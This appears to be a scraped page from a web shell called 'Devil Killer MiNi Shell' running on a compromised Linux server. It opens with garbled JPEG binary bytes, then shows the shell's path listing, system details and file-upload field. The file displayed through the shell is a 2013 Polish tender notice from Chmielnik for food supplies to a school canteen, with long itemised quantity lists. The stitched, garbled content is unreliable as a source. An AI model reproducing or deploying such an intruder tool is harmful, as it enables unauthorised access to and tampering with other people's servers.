JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130208/53126-N-2013.html

<p class="kh_header"><b>Chmielnik: Dostawa produktów spożywczych do stołówki szkolnej</b><br>
<b>Numer ogłoszenia: 53126 - 2013; data zamieszczenia: 08.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Oświaty , Plac Kościuszki 7, 26-020 Chmielnik, woj. świętokrzyskie, tel. 41 354 32 73, faks 41 354 32 73 wew. 121.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów spożywczych do stołówki szkolnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych stosownie do bieżących potrzeb do stołówki szkolnej przy Gimnazjum im. Gen. Kazimierza Tańskiego w Chmielniku, ul. Szkolna 7, zgodnie z warunkami wynikającymi z obowiązujących przepisów, w szczególności ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. Nr 171, poz. 1225 z późn. zm.) w tym w szczególności:
-	artykułów spożywczych (różnych),
-	artykułów spożywczych mrożonych,
-	mięsa, przetworów mięsnych,
-	drobiu,
-	ryb,
-	warzyw i owoców,
-	pieczarek,
-	ziemniaków,
-	jaj,
-	mleka i produktów mleczarskich,
-	pieczywa, świeżych wyrobów piekarskich.
Przedmiot zamówienia będzie realizowany sukcesywnie w ilościach wynikających 
z zapotrzebowań składanych bezpośrednio przez Zamawiającego. Dostawy następować będą na podstawie telefonicznego lub pisemnego zamówienia, którego dokona pracownik upoważniony przez Zamawiającego (intendent) w terminie 24 godzin od momentu złożenia zamówienia.
Zamówienie prowadzone w częściach: 
Część 1 - artykuły spożywcze (różne) - zgodnie z formularzem ofertowym - 
załącznik nr 1a do SIWZ
1.Chrzan tarty 180g	30szt.
2.Pomidory w puszce 400g	170szt.
3.Groszek konserwowy 400g	40szt.
4.Koncentrat grzybowy 180g	10szt.
5.Koncentrat pomidorowy 30% 200g np. Pudliszki 	700szt.
6.Zupa grzybowa 60g	100szt.
7.Zupa pieczarkowa 60g	120szt.
8.Zupa brokułowa 60g	60szt.
9.Barszcz biały 66g	350szt.
10.Barszcz biały (butelka)	180L
11.Sos pomidorowy 38g	120szt.
12.Sos pieczeniowy ciemny 30g	110szt.
13.Delikat do kurczaka 25g	400szt.
14.Rosół wołowy 6 kostek w opakowaniu	60op.
15.Rosół drobiowy 6 kostek w opakowaniu	100op.
16.Rosołki warzywne 6 kostek 	100szt.
17.Vegeta (np. Podravka)	90kg
18.Sól zmiękczająca mięso 30g	40szt.
19.Sos koperkowo-ziołowy 9g	120szt.
20.Maggi w płynie 200g	100szt.
21.Bazylia 10g	30szt.
22.Oregano 10g	30szt.
23.Sól czosnkowa 20g	100szt.
24.Zioła prowansalskie 10g	30szt.
25.Przyprawa do ryb 20g	30szt.
26.Liść laurowy 15g	160szt.
27.Majeranek 10g	160szt.
28.Pieprz czarny 15g	300szt.
29.Ziele angielskie 15g	200szt.
30.Papryka słodka 20g	20szt.
31.Cukier op. 1 kg	250kg
32.Sól op. 1 kg	360kg
33.Kwasek cytrynowy 70g	50szt.
34.Majonez kielecki 	100kg
35.Ryż	100kg
36.Ryż ekspresowy (4 saszetki w opakowaniu)	400op.
37.Kasza jęczmienna perłowa	280kg
38.Mąka ziemniaczana	20kg
39.Mąka pszenna typ 450	200kg
40.Makaron nitki (pięciojajeczny) np. czaniecki	400kg
41.Makaron (fale, rurki, świderki itp.) np. Lubella	750kg
42.Olej roślinny 5L	50szt.
43.Olej słonecznikowy 1L	10szt.
44.Ogórek konserwowy 0,9L	480szt.
45.Ogórek kiszony	225kg
46.Bułki parowane 	2 500szt.
47.Soczki w kartonikach różne smaki 02,L	2 000szt.
48.Batoniki czekoladowe 39g np. Grześki	3 000szt.
49.Wafelki 49g np. Pincessa	1 500szt.
50.Wafelki 25g np. Knoppers	2 500szt.
51.Paluszki słone 70g np. Lajkonik		1 500szt.
52.Groch łuskany 500g	100szt.
53.Dżem 260g różne smaki	50szt.
Część 2 - artykuły spożywcze mrożone - zgodnie z formularzem ofertowym - załącznik nr 1b do SIWZ.
1.Marchewka mrożona (kostka)	60kg
2.Kalafior mrożony	30kg
3.Zupy jarzynowe siedmioskładnikowe	40kg
4.Truskawki mrożone	100kg
5.Kluski śląskie	300kg
6.Pyzy z mięsem	150kg
7.Uszka z kapustą i grzybami	130kg
8.Pierogi z serem	150kg
9.Pierogi z mięsem i kapustą	700kg
10.Pierogi z grzybami i kapustą	700kg
11.Knedle ze śliwkami		800kg
12.Pyzy ziemniaczane		700kg
Część 3 - mięso, przetwory mięsne - zgodnie z formularzem ofertowym - 
załącznik nr 1c do SIWZ.
1.Schab wieprzowy  (bez kości)	300kg
2.Karkówka  (bez kości)	400kg
3.Mięso z szynki (bez kości)	400kg
4.Łopatka wieprzowa (bez kości)	400kg
5.Mięso gulaszowe wieprzowe (bez kości)	500kg
6.Łata wołowa	40kg
7.Pręga wołowa	40kg
8.Wołowe drobne	40kg
9.Słonina	150kg
10.Ogon wołowy	30kg
11.Kości wieprzowe	210kg
12.Żeberka wieprzowe	30kg
13.Smalec w kostkach	230kg
14.Kiełbasa podwawelska	450kg
15.Kiełbasa śląska	50kg
16.Parówka wieprzowa (minimum 50% mięsa) 	300kg
17.Boczek wędzony	40kg
Część 4 - drób - zgodnie z formularzem ofertowym - załącznik nr 1d do SIWZ.
1.Filet z kurczaka (świeży)	560kg
2.Udko z kurczaka (świeże)	600kg
3.Korpus z kurczaka ze skrzydłami (świeży)	700kg
Część 5 - ryby - zgodnie z formularzem ofertowym - załącznik nr 1e do SIWZ. 
1.Filet z mintaja (mrożony) do 30% glazury	800kg
Część 6 - warzywa i owoce - zgodnie z formularzem ofertowym - 
załącznik nr 1f do SIWZ.
1.Cebula	280kg
2.Marchew	500kg
3.Seler (korzeń)	170kg
4.Pietruszka (korzeń)	180kg
5.Por	180szt.
6.Ogórki sałatkowe	200kg
7.Pietruszka natka (w pęczkach)	500szt.
8.Szczypior (w pęczkach)	50szt.
9.Koper świeży (w pęczkach)	800szt.
10.Czosnek (główka)	120szt.
11.Rzodkiewka (w pęczkach)	40szt.
12.Kapusta biała	200szt.
13.Kapusta czerwona	150szt.
14.Kalafior (minimum 1,5kg)	100szt.
15.Brokuły	100szt.
16.Buraki czerwone	900kg
17.Fasola Jaś duży	180kg
18.Kapusta kiszona	600kg
19.Kapusta pekińska	200szt.
20.Papryka czerwona, słodka	10kg
21.Jabłka	1 000kg
22.Mandarynki	60kg
23.Banany	150kg
24.Kiwi	50kg
25.Pomarańcze	60kg
Część 7 - ziemniaki - zgodnie z formularzem ofertowym - załącznik nr 1h do SIWZ.
1.Ziemniaki jadalne (w workach siatkowych po 15kg)	8 000kg
Część 8 - pieczarki - zgodnie z formularzem ofertowym - załącznik nr 1g do SIWZ.
1.Pieczarki 	150kg
Część 9 - jaja - zgodnie z formularzem ofertowym - załącznik nr 1i do SIWZ.
1.Jaja (rozmiar minimum XL)	8 000szt.
Część 10 - mleko i produkty mleczarskie - zgodnie z formularzem ofertowym - załącznik nr 1j do SIWZ.
1.Jogurt naturalny 180g	30szt.
2.Jogurt 400g np. Aktimel	900szt.
3.Serek waniliowy 140g	3 500szt.
4.Jogurt owocowy od 120g do150 g (różne smaki)		8 500szt.
5.Ser biały półtłusty	250kg
6.Ser żółty (Gouda)	100kg
7.Ser topiony śmietankowy	45kg
8.Śmietana 30%	800L
9.Masło Extra (kostka 250g)	50kg
10.Margaryna (kostka 250g) np. Palma 	120kg
Część 11 - pieczywo, świeże wyroby piekarskie - zgodnie z formularzem ofertowym - załącznik nr 1k do SIWZ.
1.Chleb mieszany krojony 0,9kg	1 200	szt.
2.Chleb mieszany 0,6kg (foremka) krojony	700	szt.
3.Bułka zwykła pszenna 100g	4 500	szt.
4.Bułka słodka z nadzieniem 100g	3 000	szt.
5.Bułka tarta	60 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa 
w art. 67 ust.1 pkt 7  ustawy Prawo zamówień publicznych stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na rozszerzeniu dostawy, jeżeli zmiana wykonawcy powodowałaby konieczność nabywania rzeczy o innych parametrach technicznych, co powodowałoby niekompatybilność techniczną lub nieproporcjonalnie duże trudności techniczne w użytkowaniu i dozorze, jeżeli zamówienie podstawowe zostało udzielone w trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Na potwierdzenie spełnienia w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Na potwierdzenie spełnienia w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Na potwierdzenie spełnienia w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Na potwierdzenie spełnienia w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Na potwierdzenie spełnienia w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty ( jeżeli dotyczy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Treść umowy zostanie odpowiednio dostosowana w zależności od tego, czy w wyniku niniejszego przetargu zostanie wybrany jeden, czy więcej Wykonawców. Umowa będzie zawierała zapis:
-ustalenia zawarte w niniejszej umowie są ostateczne i nie mogą ulec zmianie, chyba, że:
nastąpi zmiana ustawowej stawki podatku VA T,
zmiana ilości dostarczanych produktów spożywczych ze względu na zmianę liczby uczniów lub pracowników szkoły uprawnionych do korzystania ze stołówki szkolnej.
-w przypadku ustawowej zmiany stawki podatku VAT Zamawiający może dokonać zmiany umowy w zakresie wynagrodzenia Wykonawcy, a ewentualna zmiana może nastąpić ze skutkiem od dnia ogłoszenia w Dzienniku Ustaw i wejścia w życie ustawy zmieniającej wysokość stawki podatku VAT do dnia zakończenia realizacji przedmiotu zamówienia, po złożeniu stosownego wniosku o dokonanie takiej zmiany przez Wykonawcę lub przez Zamawiającego,
-zmiany te można będzie wprowadzić wyłącznie za zgodą obu umawiających się stron w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chmielnik.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Oświaty
Plac Kościuszki 7
26-020 Chmielnik
Pokój nr 121.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2013 godzina 10:00, miejsce: Zespół Obsługi Oświaty
Plac Kościuszki 7
26-020 Chmielnik
Pokój nr 102 (Sekretariat UMiG Chmielnik).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze (różne).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla tej części:
Chrzan tarty 180g	30szt.
Pomidory w puszce 400g	170szt.
Groszek konserwowy 400g	40szt.
Koncentrat grzybowy 180g	10szt.
Koncentrat pomidorowy 30% 200g np. Pudliszki 	700szt.
Zupa grzybowa 60g	100szt.
Zupa pieczarkowa 60g	120szt.
Zupa brokułowa 60g	60szt.
Barszcz biały 66g	350szt.
Barszcz biały (butelka)	180L
Sos pomidorowy 38g	120szt.
Sos pieczeniowy ciemny 30g	110szt.
Delikat do kurczaka 25g	400szt.
Rosół wołowy 6 kostek w opakowaniu	60op.
Rosół drobiowy 6 kostek w opakowaniu	100op.
Rosołki warzywne 6 kostek 	100szt.
Vegeta (np. Podravka)	90kg
Sól zmiękczająca mięso 30g	40szt.
Sos koperkowo-ziołowy 9g	120szt.
Maggi w płynie 200g	100szt.
Bazylia 10g	30szt.
Oregano 10g	30szt.
Sól czosnkowa 20g	100szt.
Zioła prowansalskie 10g	30szt.
Przyprawa do ryb 20g	30szt.
Liść laurowy 15g	160szt.
Majeranek 10g	160szt.
Pieprz czarny 15g	300szt.
Ziele angielskie 15g	200szt.
Papryka słodka 20g	20szt.
Cukier op. 1 kg	250kg
Sól op. 1 kg	360kg
Kwasek cytrynowy 70g	50szt.
Majonez kielecki 	100kg
Ryż	100kg
Ryż ekspresowy (4 saszetki w opakowaniu)	400op.
Kasza jęczmienna perłowa	280kg
Mąka ziemniaczana	20kg
Mąka pszenna typ 450	200kg
Makaron nitki (pięciojajeczny) np. czaniecki	400kg
Makaron (fale, rurki, świderki itp.) np. Lubella	750kg
Olej roślinny 5L	50szt.
Olej słonecznikowy 1L	10szt.
Ogórek konserwowy 0,9L	480szt.
Ogórek kiszony	225kg
Bułki parowane 	2 500szt.
Soczki w kartonikach różne smaki 02,L	2 000szt.
Batoniki czekoladowe 39g np. Grześki	3 000szt.
Wafelki 49g np. Pincessa	1 500szt.
Wafelki 25g np. Knoppers	2 500szt.
Paluszki słone 70g np. Lajkonik		1 500szt.
Groch łuskany 500g	100szt.
Dżem 260g różne smaki	50szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykuły spożywcze mrożone..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla tej części obejmuje: 
Marchewka mrożona (kostka)	60kg
Kalafior mrożony	30kg
Zupy jarzynowe siedmioskładnikowe	40kg
Truskawki mrożone	100kg
Kluski śląskie	300kg
Pyzy z mięsem	150kg
Uszka z kapustą i grzybami	130kg
Pierogi z serem	150kg
Pierogi z mięsem i kapustą	700kg
Pierogi z grzybami i kapustą	700kg
Knedle ze śliwkami		800kg
Pyzy ziemniaczane		700kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso, przetwory mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla tej części obejmuje: 
Schab wieprzowy  (bez kości)	300kg
Karkówka  (bez kości)	400kg
Mięso z szynki (bez kości)	400kg
Łopatka wieprzowa (bez kości)	400kg
Mięso gulaszowe wieprzowe (bez kości)	500kg
Łata wołowa	40kg
Pręga wołowa	40kg
Wołowe drobne	40kg
Słonina	150kg
Ogon wołowy	30kg
Kości wieprzowe	210kg
Żeberka wieprzowe	30kg
Smalec w kostkach	230kg
Kiełbasa podwawelska	450kg
Kiełbasa śląska	50kg
Parówka wieprzowa (minimum 50% mięsa) 	300kg
Boczek wędzony	40kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje dla tej części: 
Filet z kurczaka (świeży)	560kg
Udko z kurczaka (świeże)	600kg
Korpus z kurczaka ze skrzydłami (świeży)	700kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla tej części obejmuje:
Filet z mintaja (mrożony) do 30% glazury	800kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla tej części obejmuje: 
Cebula	280kg
Marchew	500kg
Seler (korzeń)	170kg
Pietruszka (korzeń)	180kg
Por	180szt.
Ogórki sałatkowe	200kg
Pietruszka natka (w pęczkach)	500szt.
Szczypior (w pęczkach)	50szt.
Koper świeży (w pęczkach)	800szt.
Czosnek (główka)	120szt.
Rzodkiewka (w pęczkach)	40szt.
Kapusta biała	200szt.
Kapusta czerwona	150szt.
Kalafior (minimum 1,5kg)	100szt.
Brokuły	100szt.
Buraki czerwone	900kg
Fasola Jaś duży	180kg
Kapusta kiszona	600kg
Kapusta pekińska	200szt.
Papryka czerwona, słodka	10kg
Jabłka	1 000kg
Mandarynki	60kg
Banany	150kg
Kiwi	50kg
Pomarańcze	60kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
